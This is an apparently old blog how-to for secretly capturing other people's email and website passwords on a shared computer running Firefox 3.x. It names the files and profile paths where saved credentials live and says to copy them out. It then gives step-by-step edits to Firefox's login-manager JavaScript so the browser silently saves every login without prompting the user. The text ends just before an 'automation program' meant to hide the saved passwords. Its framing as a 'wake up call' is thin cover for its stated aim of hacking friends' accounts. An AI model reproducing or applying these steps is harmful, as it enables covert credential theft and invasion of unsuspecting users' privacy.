Do you want to hack or know your friends email account or passwords or any login details? Are you using Firefox 3.6 or lesser version browser? Here is the way to what you finding. Before that beware that it will hurt so many of your friends and buddies. Doing this is purely at your own risk. This post is a wake up call for someone, who blindly using some others system or laptop. By this way the user definitely does not know about that their password is stored in the system. Any way they cannot restrict the system from storing their user account and password.
Once the user logged into the machine that will be the end of the user's privacy. I am a PHP guy so I have written a small PHP program for storing the users account and password. Without the PHP program also you can able to identify the users email accounts and password, but not the 100%.
Ok let’s go to the steps
I thing everyone knows that the Firefox always asking for a remember password, whenever you logging with any email account or any other website. That is the key to hack the accounts.
Do you know where the password has been stored once you click on remember password. If you know then that's good. By default whenever you click on remember password it will be stored in the key3.db and signons.sqlite in Firefox 3.5/3.6 and key3.db and signons.txt in Firefox 3.0.
When you want to view the password stored in Firefox. It can be done in two ways:
1. Click Tools –> Options–> Select security Tab –> click on Saved Password –> click on Show Passwords
Now you can see all the saved passwords.
2. Firefox stores key3.db and signons.sqlite files in Firefox Profile directory.
You can find the Firefox default profile directory over here:
For Windows XP/2000:
C:\Documents and Settings\
\Local Settings\Application Data\Mozilla\Firefox\Profiles\xxxxxxxx.default
For Windows 7/vista:
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default
Note: xxxxxxxx represents a random string of 8 characters.
Now you can copy both the files in your backup folder.
If you need the passwords, copy key3.db and signons.sqlite files in the Firefox Profile directory of your PC from your backup folder.
For Windows XP/2000:
C:\Documents and Settings\\Local Settings\Application Data\Mozilla\Firefox\Profiles\xxxxxxxx.default
For Windows 7/vista:
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default
Now navigate to Click Tools –> Options–> Select security Tab –> Click on Saved Password –> click on Show Passwords
Now we will go to the automated system.
First thing you have to change the Firefox JavaScript file to restrict the asking of remember password while login.
And make the code to store password always, But without asking remember password.
Go to C:\Program Files\Mozilla Firefox\Components
Look for nsloginmanagerprompter.js file. Right click on it and hit on "Edit with Notepad++" or open with any editor.
Press "CTRL + F" and paste in the find box "_showSaveLoginNotification" click enter. This will give you the place to edit.
Next line you can see a line
Line Start: "var neverButtonText ="
Line End: "this._showLoginNotification(aNotifyBox, "password-save", notificationText, buttons);"
Replace all from Line Start to Line End with the below two line.
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
Likewise look for "_showChangeLoginNotification" and replace everything inside the flower braces with the following two lines
var pwmgr = this._pwmgr;
pwmgr.modifyLogin(aOldLogin, aNewLogin);
Now you are ready. But now the user can identify whether their password stored or not from
Tools --> Options–> Select security Tab –> click on Saved Password –> click on Show Passwords
For this you need a simple automation program.
